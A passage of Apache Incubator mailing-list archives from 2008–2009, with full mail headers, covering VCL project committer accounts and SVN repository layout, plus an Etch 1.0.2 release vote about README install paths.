uni12mr.unity.ncsu.edu) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 18 Nov 2008 16:55:14 +0000 Received: from nom28625d.nomadic.ncsu.edu (nom28625d.nomadic.ncsu.edu [161.129.204.104]) (authenticated bits=0) by uni12mr.unity.ncsu.edu (8.13.7/8.13.8/Nv5.2008.0610.1) with ESMTP id mAIGrOKS015815 (version=TLSv1/SSLv3 cipher=AES128-SHA bits=128 verify=NO); Tue, 18 Nov 2008 11:53:25 -0500 (EST) Cc: Henry E Schaffer <[email protected]>, Matt Hogstrom <[email protected]> Message-Id: <[email protected]> From: Brian Bouterse <[email protected]> To: [email protected] Content-Type: multipart/alternative; boundary=Apple-Mail-6--388098989 Mime-Version: 1.0 (Apple Message framework v929.2) Subject: Fwd: NCSU apache.org accounts Date: Tue, 18 Nov 2008 11:53:24 -0500 References: <[email protected]> X-Mailer: Apple Mail (2.929.2) X-PMX-Version: 161.129.204.1040218, Antispam-Engine: 161.129.204.1043940, Antispam-Data: 2161.129.204.104319 X-Spam-Level: IIIIIII X-Virus-Checked: Checked by ClamAV on apache.org X-Old-Spam-Status: No, Hits=7% --Apple-Mail-6--388098989 Content-Type: text/plain; charset=US-ASCII; format=flowed; delsp=yes Content-Transfer-Encoding: 7bit Most of us have received our committer accounts, but the username 'hes' for Henry Schaffer (who has submitted his ICLA) has not been created yet. Who do we talk to about getting this unstuck? Thanks in advance! Best, Brian Brian Bouterse Secure Open Systems Initiative 629-259-4888 Begin forwarded message: > From: Henry E Schaffer <[email protected]> > Date: November 18, 2008 10:19:05 AM EST > To: Brian Bouterse <[email protected]> > Subject: Re: NCSU apache.org accounts > > Brian, > I'm looking at http://incubator.apache.org/projects/vcl.html > Should I be included in the list? > -- > --henry --Apple-Mail-6--388098989-- From [email protected] Wed Nov 19 02:14:36 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 73612 invoked from network); 19 Nov 2008 02:14:36 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 19 Nov 2008 02:14:36 -0000 Received: (qmail 20084 invoked by uid 500); 19 Nov 2008 02:14:43 -0000 Delivered-To: [email protected] Received: (qmail 20076 invoked by uid 500); 19 Nov 2008 02:14:43 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <vcl-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 20065 invoked by uid 99); 19 Nov 2008 02:14:43 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 18 Nov 2008 18:14:43 -0800 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO mho-01-bos.mailhop.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 19 Nov 2008 02:13:20 +0000 Received: from schweitzer-lbt.air-pipe.com ([161.129.204.104] helo=[161.129.204.104]) by mho-01-bos.mailhop.org with esmtpsa (TLSv1:AES128-SHA:128) (Exim 4.68) (envelope-from <[email protected]>) id 1L2cYi-000LZu-LV for [email protected]; Wed, 19 Nov 2008 02:12:48 +0000 X-Mail-Handler: MailHop Outbound by DynDNS X-Originating-IP: 161.129.204.104 X-Report-Abuse-To: [email protected] (see http://www.mailhop.org/outbound/abuse.html for abuse reporting information) X-MHO-User: U2FsdGVkX1964QN5kHoCzoHtzVCDytes Message-Id: <[email protected]> From: Matt Hogstrom <[email protected]> To: [email protected] In-Reply-To: <[email protected]> Content-Type: text/plain; charset=US-ASCII; format=flowed; delsp=yes Content-Transfer-Encoding: 7bit Mime-Version: 1.0 (Apple Message framework v929.2) Subject: Re: NCSU apache.org accounts Date: Tue, 18 Nov 2008 18:12:46 -0800 References: <[email protected]> <[email protected]> X-Mailer: Apple Mail (2.929.2) X-Virus-Checked: Checked by ClamAV on apache.org I see that Henry has sent in his ICLA. http://people.apache.org/~jim/committers.html#unlistedclas However, he was not listed in the original proposal and this is the first time his name has come up. http://wiki.apache.org/incubator/VCLProposal Since the proposal was the document that was voted on it would be inappropriate for us to add new people based on that. At this time I recommend that we get cracking on getting the code in and That Henry dig in through patches and other efforts. I'm confident that his contributions will be evident and that he will earn commit quickly based on his contributions. On Nov 18, 2008, at 8:53 AM, Brian Bouterse wrote: > Most of us have received our committer accounts, but the username > 'hes' for Henry Schaffer (who has submitted his ICLA) has not been > created yet. Who do we talk to about getting this unstuck? > > Thanks in advance! > > Best, > Brian > > > Brian Bouterse > Secure Open Systems Initiative > 629-259-4888 > > > > > Begin forwarded message: > >> From: Henry E Schaffer <[email protected]> >> Date: November 18, 2008 10:19:05 AM EST >> To: Brian Bouterse <[email protected]> >> Subject: Re: NCSU apache.org accounts >> >> Brian, >> I'm looking at http://incubator.apache.org/projects/vcl.html >> Should I be included in the list? >> -- >> --henry > From [email protected] Wed Nov 19 22:42:42 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 88743 invoked from network); 19 Nov 2008 22:42:42 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 19 Nov 2008 22:42:42 -0000 Received: (qmail 83044 invoked by uid 500); 19 Nov 2008 22:42:50 -0000 Delivered-To: [email protected] Received: (qmail 83028 invoked by uid 500); 19 Nov 2008 22:42:50 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <vcl-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 83017 invoked by uid 99); 19 Nov 2008 22:42:50 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 19 Nov 2008 14:42:50 -0800 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO uni12mr.unity.ncsu.edu) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 19 Nov 2008 22:41:27 +0000 Received: from [161.129.204.104] (cpe-069-134-224-088.nc.res.rr.com [161.129.204.104]) (authenticated bits=0) by uni12mr.unity.ncsu.edu (8.13.7/8.13.8/Nv5.2008.0610.1) with ESMTP id mAJMdcn9023541 (version=TLSv1/SSLv3 cipher=AES128-SHA bits=128 verify=NO) for <[email protected]>; Wed, 19 Nov 2008 17:39:40 -0500 (EST) Message-Id: <[email protected]> From: Brian Bouterse <[email protected]> To: [email protected] Content-Type: text/plain; charset=US-ASCII; format=flowed; delsp=yes Content-Transfer-Encoding: 7bit Mime-Version: 1.0 (Apple Message framework v929.2) Subject: VCL 2.0 code svn transfer Date: Wed, 19 Nov 2008 17:39:38 -0500 X-Mailer: Apple Mail (2.929.2) X-PMX-Version: 161.129.204.1040218, Antispam-Engine: 161.129.204.1043940, Antispam-Data: 2161.129.204.104843 X-Spam-Level: IIIIIII X-Virus-Checked: Checked by ClamAV on apache.org X-Old-Spam-Status: No, Hits=7% I know the current VCL development team are finishing and packaging the 2.0 code as quickly as they can. Do those folks who have the code have a plan for which user was going to transfer the svn and when? Cheers, Brian Brian Bouterse Secure Open Systems Initiative From [email protected] Thu Nov 20 17:55:57 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 45735 invoked from network); 20 Nov 2008 17:55:57 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 20 Nov 2008 17:55:57 -0000 Received: (qmail 9516 invoked by uid 500); 20 Nov 2008 17:56:06 -0000 Delivered-To: [email protected] Received: (qmail 9505 invoked by uid 500); 20 Nov 2008 17:56:06 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <vcl-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 9494 invoked by uid 99); 20 Nov 2008 17:56:06 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 20 Nov 2008 09:56:06 -0800 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO mho-02-bos.mailhop.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 20 Nov 2008 17:54:42 +0000 Received: from schweitzer-lbt.air-pipe.com ([161.129.204.104] helo=[161.129.204.104]) by mho-02-bos.mailhop.org with esmtpsa (TLSv1:AES128-SHA:128) (Exim 4.68) (envelope-from <[email protected]>) id 1L3DjG-000DDe-HR for [email protected]; Thu, 20 Nov 2008 17:54:10 +0000 X-Mail-Handler: MailHop Outbound by DynDNS X-Originating-IP: 161.129.204.104 X-Report-Abuse-To: [email protected] (see http://www.mailhop.org/outbound/abuse.html for abuse reporting information) X-MHO-User: U2FsdGVkX18HmhXB3wEnwjD9yM+4c+J7 Message-Id: <[email protected]> From: Matt Hogstrom <[email protected]> To: [email protected] In-Reply-To: <[email protected]> Content-Type: text/plain; charset=US-ASCII; format=flowed; delsp=yes Content-Transfer-Encoding: 7bit Mime-Version: 1.0 (Apple Message framework v929.2) Subject: Re: VCL 2.0 code svn transfer Date: Thu, 20 Nov 2008 09:54:07 -0800 References: <[email protected]> X-Mailer: Apple Mail (2.929.2) X-Virus-Checked: Checked by ClamAV on apache.org Great question. Perhaps Aaron can comment on their status. I wouldn't want to delay work in progress but it would be great to move the code here and folks can start getting their hands dirty on vetting the IP and see the packaging process in action. On Nov 19, 2008, at 2:39 PM, Brian Bouterse wrote: > I know the current VCL development team are finishing and packaging > the 2.0 code as quickly as they can. Do those folks who have the > code have a plan for which user was going to transfer the svn and > when? > > Cheers, > Brian > > > Brian Bouterse > Secure Open Systems Initiative > > > > > From [email protected] Fri Nov 21 15:04:11 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 7029 invoked from network); 21 Nov 2008 15:04:10 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 21 Nov 2008 15:04:10 -0000 Received: (qmail 73760 invoked by uid 500); 21 Nov 2008 15:04:20 -0000 Delivered-To: [email protected] Received: (qmail 73745 invoked by uid 500); 21 Nov 2008 15:04:20 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <vcl-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 73734 invoked by uid 99); 21 Nov 2008 15:04:19 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 21 Nov 2008 07:04:19 -0800 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO uni12mr.unity.ncsu.edu) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 21 Nov 2008 15:02:54 +0000 Received: from vilya.csc.ncsu.edu (vilya.csc.ncsu.edu [161.129.204.104]) by uni12mr.unity.ncsu.edu (8.13.7/8.13.8/Nv5.2008.0610.1) with ESMTP id mALF17kq013406 for <[email protected]>; Fri, 21 Nov 2008 10:01:08 -0500 (EST) Date: Fri, 21 Nov 2008 10:01:07 -0500 From: Aaron Peeler <[email protected]> To: vcl-dev apache <[email protected]> Subject: getting started using apache tools and processes Message-ID: <[email protected]> X-Mailer: Mulberry/4.0.8 (Mac OS X) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline X-PMX-Version: 161.129.204.1040218, Antispam-Engine: 161.129.204.1043940, Antispam-Data: 2161.129.204.104913 X-Spam-Level: IIIIIII X-Virus-Checked: Checked by ClamAV on apache.org X-Old-Spam-Status: No, Hits=7% Matt, et all mentors, What are our next steps in getting started or ideally what are the best practices in using the Apache processes and tools. I'm sure one of the next immediate steps is to add our most recent VCL code to the svn. Is there a recommended structure for the svn - branches, stable releases, etc, that apache would like us to follow, or is that to our own design? Thanks, Aaron Aaron Peeler OIT Advanced Computing College of Engineering-NCSU http://vcl.ncsu.edu From [email protected] Fri Nov 21 19:13:57 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 19583 invoked from network); 21 Nov 2008 19:13:57 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 21 Nov 2008 19:13:57 -0000 Received: (qmail 65513 invoked by uid 500); 21 Nov 2008 19:14:06 -0000 Delivered-To: [email protected] Received: (qmail 65504 invoked by uid 500); 21 Nov 2008 19:14:06 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <vcl-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 65493 invoked by uid 99); 21 Nov 2008 19:14:06 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 21 Nov 2008 11:14:06 -0800 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO mho-01-bos.mailhop.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 21 Nov 2008 19:12:40 +0000 Received: from ip67-88-206-98.z206-88-67.customer.algx.net ([161.129.204.104] helo=[161.129.204.104]) by mho-01-bos.mailhop.org with esmtpsa (TLSv1:AES128-SHA:128) (Exim 4.68) (envelope-from <[email protected]>) id 1L3bRU-000NMT-7n for [email protected]; Fri, 21 Nov 2008 19:13:24 +0000 X-Mail-Handler: MailHop Outbound by DynDNS X-Originating-IP: 161.129.204.104 X-Report-Abuse-To: [email protected] (see http://www.mailhop.org/outbound/abuse.html for abuse reporting information) X-MHO-User: U2FsdGVkX18SEmtgPYMs1kWNO0Rl/GdB Message-Id: <[email protected]> From: Matt Hogstrom <[email protected]> To: [email protected] In-Reply-To: <[email protected]> Content-Type: text/plain; charset=US-ASCII; format=flowed; delsp=yes Content-Transfer-Encoding: 7bit Mime-Version: 1.0 (Apple Message framework v929.2) Subject: Re: getting started using apache tools and processes Date: Fri, 21 Nov 2008 11:13:19 -0800 References: <[email protected]> X-Mailer: Apple Mail (2.929.2) X-Virus-Checked: Checked by ClamAV on apache.org We can create any structure we want. I propose the following which is consistent with a number of [email protected]. Our SVN repository is at: https://svn.apache.org/repos/asf/incubator/vcl In that directory I created the following directories as a strawman: trunk (current development work) branches (place for release work, bug fixes, etc.) tags (directory that contains releases, this maps to released software so no changes should be made to releases in this tree) sandbox (as the name implies, funky stuff, experimentation, etc.) On Nov 21, 2008, at 7:01 AM, Aaron Peeler wrote: > Matt, et all mentors, > > What are our next steps in getting started or ideally what are the > best practices in using the Apache processes and tools. > > I'm sure one of the next immediate steps is to add our most recent > VCL code to the svn. Is there a recommended structure for the svn - > branches, stable releases, etc, that apache would like us to follow, > or is that to our own design? > > Thanks, > Aaron > > Aaron Peeler > OIT Advanced Computing > College of Engineering-NCSU > http://vcl.ncsu.edu > From [email protected] Fri Nov 21 19:37:23 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 26215 invoked from network); 21 Nov 2008 19:37:23 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 21 Nov 2008 19:37:23 -0000 Received: (qmail 97407 invoked by uid 500); 21 Nov 2008 19:37:32 -0000 Delivered-To: [email protected] Received: (qmail 97392 invoked by uid 500); 21 Nov 2008 19:37:32 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <vcl-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 97381 invoked by uid 99); 21 Nov 2008 19:37:32 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 21 Nov 2008 11:37:32 -0800 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO uni12mr.unity.ncsu.edu) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 21 Nov 2008 19:36:07 +0000 Received: from vilya.csc.ncsu.edu (vilya.csc.ncsu.edu [161.129.204.104]) by uni12mr.unity.ncsu.edu (8.13.7/8.13.8/Nv5.2008.0610.1) with ESMTP id mALJanvO002429 for <[email protected]>; Fri, 21 Nov 2008 14:36:50 -0500 (EST) Date: Fri, 21 Nov 2008 14:36:49 -0500 From: Aaron Peeler <[email protected]> To: [email protected] Subject: Re: getting started using apache tools and processes Message-ID: <[email protected]> In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> X-Mailer: Mulberry/4.0.8 (Mac OS X) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline X-PMX-Version: 161.129.204.1040218, Antispam-Engine: 161.129.204.1043940, Antispam-Data: 2161.129.204.104222 X-Spam-Level: IIIIIII X-Virus-Checked: Checked by ClamAV on apache.org X-Old-Spam-Status: No, Hits=7% Sounds good - thanks. Aaron --On November 21, 2008 11:13:19 AM -0800 Matt Hogstrom <[email protected]> wrote: > We can create any structure we want. I propose the following which is > consistent with a number of [email protected]. > > Our SVN repository is at: https://svn.apache.org/repos/asf/incubator/vcl > > In that directory I created the following directories as a strawman: > > trunk (current development work) > branches (place for release work, bug fixes, etc.) > tags (directory that contains releases, this maps to released software > so no changes should be made to releases in this tree) > sandbox (as the name implies, funky stuff, experimentation, etc.) > > > On Nov 21, 2008, at 7:01 AM, Aaron Peeler wrote: > >> Matt, et all mentors, >> >> What are our next steps in getting started or ideally what are the >> best practices in using the Apache processes and tools. >> >> I'm sure one of the next immediate steps is to add our most recent >> VCL code to the svn. Is there a recommended structure for the svn - >> branches, stable releases, etc, that apache would like us to follow, >> or is that to our own design? >> >> Thanks, >> Aaron >> >> Aaron Peeler >> OIT Advanced Computing >> College of Engineering-NCSU >> http://vcl.ncsu.edu >> > From [email protected] Sun Nov 23 17:42:01 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 54261 invoked from network); 23 Nov 2008 17:42:01 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 23 Nov 2008 17:42:01 -0000 Received: (qmail 53085 invoked by uid 500); 23 Nov 2008 17:42:11 -0000 Delivered-To: [email protected] Received: (qmail 53065 invoked by uid 500); 23 Nov 2008 17:42:11 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <vcl-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 53053 invoked by uid 99); 23 Nov 2008 17:42:11 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 23 Nov 2008 09:42:11 -0800 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO as.toolazydogs.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 23 Nov 2008 17:40:44 +0000 Received: (qmail 3272 invoked from network); 23 Nov 2008 09:41:29 -0800 Received: from c-71-202-180-198.hsd1.ca.comcast.net (HELO ?161.129.204.104?) (161.129.204.104) by toolazydogs.com with (AES128-SHA encrypted) SMTP; 23 Nov 2008 09:41:29 -0800 Message-Id: <[email protected]> From: "Alan D. Cabrera" <[email protected]> To: [email protected] In-Reply-To: <[email protected]> Content-Type: text/plain; charset=US-ASCII; format=flowed; delsp=yes Content-Transfer-Encoding: 7bit Mime-Version: 1.0 (Apple Message framework v929.2) Subject: Re: getting started using apache tools and processes Date: Sun, 23 Nov 2008 09:41:25 -0800 References: <[email protected]> <[email protected]> X-Mailer: Apple Mail (2.929.2) X-Virus-Checked: Checked by ClamAV on apache.org I imagine that once we get the goods, we might put it initially in tags/import then copy that to trunk. Regards, Alan On Nov 21, 2008, at 11:13 AM, Matt Hogstrom wrote: > We can create any structure we want. I propose the following which > is consistent with a number of [email protected]. > > Our SVN repository is at: https://svn.apache.org/repos/asf/incubator/vcl > > In that directory I created the following directories as a strawman: > > trunk (current development work) > branches (place for release work, bug fixes, etc.) > tags (directory that contains releases, this maps to released > software so no changes should be made to releases in this tree) > sandbox (as the name implies, funky stuff, experimentation, etc.) > > > On Nov 21, 2008, at 7:01 AM, Aaron Peeler wrote: > >> Matt, et all mentors, >> >> What are our next steps in getting started or ideally what are the >> best practices in using the Apache processes and tools. >> >> I'm sure one of the next immediate steps is to add our most recent >> VCL code to the svn. Is there a recommended structure for the svn - >> branches, stable releases, etc, that apache would like us to >> follow, or is that to our own design? >> >> Thanks, >> Aaron >> >> Aaron Peeler >> OIT Advanced Computing >> College of Engineering-NCSU >> http://vcl.ncsu.edu >> > >
From [email protected] Mon Mar 02 17:58:39 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 90925 invoked from network); 2 Mar 2009 17:58:39 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 2 Mar 2009 17:58:39 -0000 Received: (qmail 20570 invoked by uid 500); 2 Mar 2009 17:58:39 -0000 Delivered-To: [email protected] Received: (qmail 20533 invoked by uid 500); 2 Mar 2009 17:58:39 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <etch-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 20522 invoked by uid 99); 2 Mar 2009 17:58:39 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 02 Mar 2009 09:58:39 -0800 X-ASF-Spam-Status: No, hits=-4.0 required=10.0 tests=RCVD_IN_DNSWL_MED,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO sj-iport-5.cisco.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 02 Mar 2009 17:58:27 +0000 X-IronPort-AV: E=Sophos;i="4.38,290,1233532800"; d="vcf'?scan'208";a="65536700" Received: from sj-dkim-4.cisco.com ([161.129.204.104]) by sj-iport-5.cisco.com with ESMTP; 02 Mar 2009 17:58:05 +0000 Received: from sj-core-2.cisco.com (sj-core-2.cisco.com [161.129.204.104]) by sj-dkim-4.cisco.com (8.12.11/8.12.11) with ESMTP id n22Hw4dW019854 for <[email protected]>; Mon, 2 Mar 2009 09:58:04 -0800 Received: from xbh-rtp-211.amer.cisco.com (xbh-rtp-211.cisco.com [161.129.204.104]) by sj-core-2.cisco.com (8.13.8/8.13.8) with ESMTP id n22Hvrgi029673 for <[email protected]>; Mon, 2 Mar 2009 17:58:04 GMT Received: from xfe-rtp-201.amer.cisco.com ([161.129.204.104]) by xbh-rtp-211.amer.cisco.com with Microsoft SMTPSVC(262)914-4166); Mon, 2 Mar 2009 12:58:03 -0500 Received: from [161.129.204.104] ([161.129.204.104]) by xfe-rtp-201.amer.cisco.com with Microsoft SMTPSVC(262)914-4166); Mon, 2 Mar 2009 12:58:03 -0500 Message-ID: <[email protected]> Date: Mon, 02 Mar 2009 11:58:03 -0600 From: "scott comer (sccomer)" <[email protected]> User-Agent: Thunderbird 161.129.204.104 (Windows/20081209) MIME-Version: 1.0 To: [email protected] Subject: Re: [vote] Release 1.0.2 (second attempt) References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> In-Reply-To: <[email protected]> Content-Type: multipart/mixed; boundary="------------090504070402080503090307" X-OriginalArrivalTime: 02 Mar 2009 17:58:03.0464 (UTC) FILETIME=[6EC99480:01C99B60] DKIM-Signature: v=1; a=rsa-sha256; q=dns/txt; l=3871; t=1236016684; x=1236880684; c=relaxed/simple; s=sjdkim4002; h=Content-Type:From:Subject:Content-Transfer-Encoding:MIME-Version; d=cisco.com; [email protected]; z=From:=20=22scott=20comer=20(sccomer)=22=20<[email protected] om> |Subject:=20Re=3A=20[vote]=20Release=201.0.2=20(second=20at tempt) |Sender:=20; bh=5dUFm4ZxkVulTH/LG8VIcb3J4tYz8vutDpNV4LXkMdo=; b=uyFFfSXGt66xEjQK63Ke1hA11cUQnRcy93GxLWcrCMLLaFneRlSSEHBS/I 13QhSJCC3sNy9rw+VKTz6BsZ3S0Ekbl0Wwh//l9cubXoTqLXpKbavK5fbg8Z o7szuQJKn0; Authentication-Results: sj-dkim-4; [email protected]; dkim=pass ( sig from cisco.com/sjdkim4002 verified; ); X-Virus-Checked: Checked by ClamAV on apache.org --------------090504070402080503090307 Content-Type: text/plain; charset=UTF-8; format=flowed Content-Transfer-Encoding: 8bit ok, the last installed i downloaded, which says release-24, works and the readme.txt is correct. +1 scott out James Dixson wrote: > ok i will look at it again > > On Mon, Feb 23, 2009 at 4:44 PM, scott comer (sccomer) > <[email protected]> wrote: > >> eh, i installed and nothing was changed. the dates on the binaries are >> changed, but the readme was the same. the readme in the source distro was >> changed. >> >> scott out >> >> James Dixson wrote: >> >>> Ok, I have updated the binaries with the README change Scott suggested. >>> >>> Scott: any comments? >>> >>> -- >>> james >>> >>> >>> On Mon, Feb 23, 2009 at 3:50 PM, James Dixson <[email protected]> wrote: >>> >>> >>>> I made the modifications and I am respinning. I will have updated >>>> downloads >>>> shortly (and it will not take a week this time ;-) ). >>>> -- >>>> James >>>> >>>> >>>> >>>> On 2/23/09 2:01 PM, "Scott Comer (sccomer)" <[email protected]> wrote: >>>> >>>> >>>> >>>>> i'm still having problems with the readme. >>>>> >>>>> install path is claimed to be >>>>> >>>>> C:\Program Files\Apache Software Foundation\apache-etch-1.0.2-incubating >>>>> >>>>> actual: >>>>> >>>>> C:\Program Files\Apache Software Foundation\apache-etch-1.0.2 >>>>> >>>>> the sorting and indent in there is a bit wonky (tabs vs. spaces). >>>>> >>>>> other than that, +1. >>>>> >>>>> scott out >>>>> >>>>> Rene Barraza (rebarraz) wrote: >>>>> >>>>> >>>>>> +1 >>>>>> >>>>>> -René >>>>>> >>>>>> -----Original Message----- >>>>>> From: Gaurav Sandhir (gsandhir) >>>>>> Sent: Monday, February 23, 2009 1:03 PM >>>>>> To: [email protected] >>>>>> Subject: RE: [vote] Release 1.0.2 (second attempt) >>>>>> >>>>>> +1 >>>>>> >>>>>> -Gaurav >>>>>> >>>>>> -----Original Message----- >>>>>> From: James Dixson [mailto:[email protected]] >>>>>> Sent: Friday, February 20, 2009 11:27 AM >>>>>> To: [email protected] >>>>>> Subject: [vote] Release 1.0.2 (second attempt) >>>>>> >>>>>> Lets try this again.. >>>>>> >>>>>> I have taken all of the suggestions I have received and spun a new set >>>>>> of release candidates. >>>>>> >>>>>> The candidate files can be found here: >>>>>> http://people.apache.org/~dixson/apache-etch/1.0.2-incubating/ >>>>>> >>>>>> Each file should have a MD5, SHA1 and a Signature. The output from RAT >>>>>> is also included "*-rat-output.txt". >>>>>> >>>>>> Please take the time to review the archives and then cast your vote. I >>>>>> will hold the vote open until Tues (24-Feb). >>>>>> >>>>>> Internal Virus Database is out of date. >>>>>> Checked by AVG - www.avg.com >>>>>> Version: 8.0.233 / Virus Database: 270.10.18/1935 - Release Date: >>>>>> 02/04/09 >>>>>> 16:35:00 >>>>>> >>>>>> >>>>>> >>>> -- >>>> James Dixson >>>> Manager, Software Development >>>> CUAE Engineering, Cisco Systems >>>> (e) [email protected] >>>> (p) (262)914-4166 >>>> (m) (262)914-4166 >>>> >>>> >>>> >>>> >>>> --------------090504070402080503090307-- From [email protected] Mon Mar 02 19:45:37 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 49790 invoked from network); 2 Mar 2009 19:45:37 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 2 Mar 2009 19:45:37 -0000 Received: (qmail 72933 invoked by uid 500); 2 Mar 2009 19:45:36 -0000 Delivered-To: [email protected] Received: (qmail 72925 invoked by uid 500); 2 Mar 2009 19:45:36 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <etch-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 